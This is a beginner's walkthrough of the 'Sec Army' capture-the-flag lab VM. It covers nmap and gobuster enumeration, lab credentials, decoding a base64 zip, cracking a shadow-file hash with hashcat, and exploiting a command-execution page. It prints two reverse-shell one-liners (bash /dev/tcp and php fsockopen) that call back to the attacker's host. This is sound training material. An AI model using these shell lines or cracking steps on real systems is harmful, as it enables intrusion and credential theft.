15 KiB
Sec Army CTF
Abdullah Rizwan | 29 October , 6:12 PM
NMAP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
| 256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_ 256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Challenge 1 (Uno)
By visting the web page which is hosted on PORT 80 we will given task 1 to solve
Now it says that there might be a hidden directory so lets brute force directory
gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we can see /anon so let's visit this directory
Now you won't see the text because it is hidden by making the text color white so it's important select all text or visit the source code of page
This may be credentials for the user for ssh lets try doing that
And we got in , got a foothold!
We easily solved the challenge
But there is a readme.txt file which says
Challenge 2 (Dos)
The readme.txt file which you have just read gives password for the user dos lets see if that user actually exists on this box
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash
And appearenlty he does ! So let's try to use switch user
We successfully switched to don
dos@svos:~$ ls -la
total 180
drwx------ 7 dos dos 4096 Oct 19 19:46 .
drwxr-xr-x 12 root root 4096 Oct 19 11:05 ..
-rw-rw-r-- 1 dos dos 47 Oct 5 09:24 1337.txt
-rw-r--r-- 1 dos dos 220 Sep 22 11:36 .bash_logout
-rw-r--r-- 1 dos dos 3771 Sep 22 11:36 .bashrc
drwx------ 2 dos dos 4096 Sep 22 12:49 .cache
drwx------ 2 dos dos 4096 Sep 22 13:59 .elinks
drwxr-xr-x 2 dos dos 135168 Sep 27 14:51 files
drwx------ 3 dos dos 4096 Sep 22 12:49 .gnupg
drwxrwxr-x 3 dos dos 4096 Sep 22 13:24 .local
-rw-r--r-- 1 dos dos 807 Sep 22 11:36 .profile
-rw-rw-r-- 1 dos dos 104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$
Now this says to find a8211ac1853a1235d48829414626512a this string which actually a md5 hash in folder files but problem is that that folder has 5001 text files
To be honest I did'nt know the command for looking for a text in files so I just used google
That returned me the result that I wanted
Now it's telling you to look at file3131.txt which gives us
UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA
If you have done some CTF's the works thing that should come to your mind is that this is a base64 encoded text :D
Head over to cyberchef
You might see something like this challenge2/flag2.txt
Hover your curosr next to Output on that something like a magic stick icon and you'll get your second flag
We can see a text from todo.txt
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
Challegne 3 (Tres)
As on the user dos's directory we can see a hint that
dos@svos:~$ cat 1337.txt
Our netcat application is too 1337 to handle..
This refers to port 1337 on the box so
I tried looking for a parameter ?p=1 , ?secret=2, ?token=3 , ?waste=3 but since this isn't a php file hosted these won't work
Then I focused on the hint and it was mentioned netcat application is too 1337 to handle . I quickly visited goolge for answers
I did find something
echo that token and pipe it to netcat by specifing IP and port
Challenge 4 (Cuatro)
Now we are in as tres so let's start exploring his home directory
Now we are presented with a binary exploitation challenge(Buffer Overflow) , we can see a binary file secarmy-village . But running it gives us an error
I couldn't figure it out what was I supposed to fix in this binary , I had an idea to do something with ghidra but I failed to do it .
Challenge 5 (Cinco)
when you visit /var/www/html this is where your webpage are being hosted , on visiting we can find directories and webpages there
anon directory was the one which we came to know through gobuster so we know that these will be shown or port80 , let's try justanothergallery
It has an index.php page and a sub directory of qr which contains a lot of qr code images that we scan
We can this qr code from any qr android application which can be downloaded through playstore or from wherever you prefer
By scanning this qr code we will get the text presented
image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck
Ahhhh , so I scanned the 64 qr images through my phone and got credentials for cinco:ruy70m35
Now the readme.txt says
cinco@svos:~$ cat readme.txt
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$
By "looking outside the house" it means to look outside the ~ (home) directory
Here we find cincos-secrets
This is all we get at cincos-secrets
We know that shadow.bak which is backup of the original shadow file belongs to cincos so we can change permissions for the file since it belongs to us
It doesn't matter which permissions you give but in a real sceanrio you should give permissions to that specific user like this
chmod u+rwx shadow.bak or depending upon the type of file it is
Or
chmod 700 shadow.bak
On reading file we will see a hash
seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::
We already know from the hint that we need to user rockyou.txt
Copy this whole hash and put it in a file , not necessary to give a txt extension. Now you can either use john the ripper or hashcat , for me john the ripper was taking too long so I used hashcat (although it doesn't work sometimes on windows but it dit work :D)
hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx
Challenge 6 (Seis)
I didn't solve this one in order xD
Challenge 7 (Siete)
Visiting /var/www/html we will see shellcmsdashboard so lets hop over to that directory
Coming back to the box , we can a robots.txt by reading it we can a password there
On giving the right credentials , it's going to point us to go on the next page
Now this here is a RCE vulnerability , we can give any command we want and it will execute this for us
Now we have seen that there was readme9213.txt we can easily read it because we are www-data in this case and that file belongs it .
But doing cat readme9213.txt won't give us the result so we need a reverse shell in order to read that file.
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/192.168.1.7/4444 0>&1 - This did'nt worked php -r '$sock=fsockopen("192.168.1.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");' This did
We cannot read the file because it's permissions are to just write and execute but since it belongs to us we can pretty much change it to readable.
/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root root 4096 Oct 8 17:51 ..
-rwxrwxrwx 1 root root 1459 Oct 1 17:57 aabbzzee.php
-rwxrwxrwx 1 root root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root 48 Oct 8 17:54 readme9213.txt
-rwxrwxrwx 1 root root 58 Oct 1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$
Hint is given which tells that the message is a decimal text
On decoding the message from deciaml we get
I wasn't able to solve this challenge so couldn't proceed any further.
End
So I didn't see how the remaining challenges looked like , although it was easy but I didn't had that much exposure to CTF competitions.
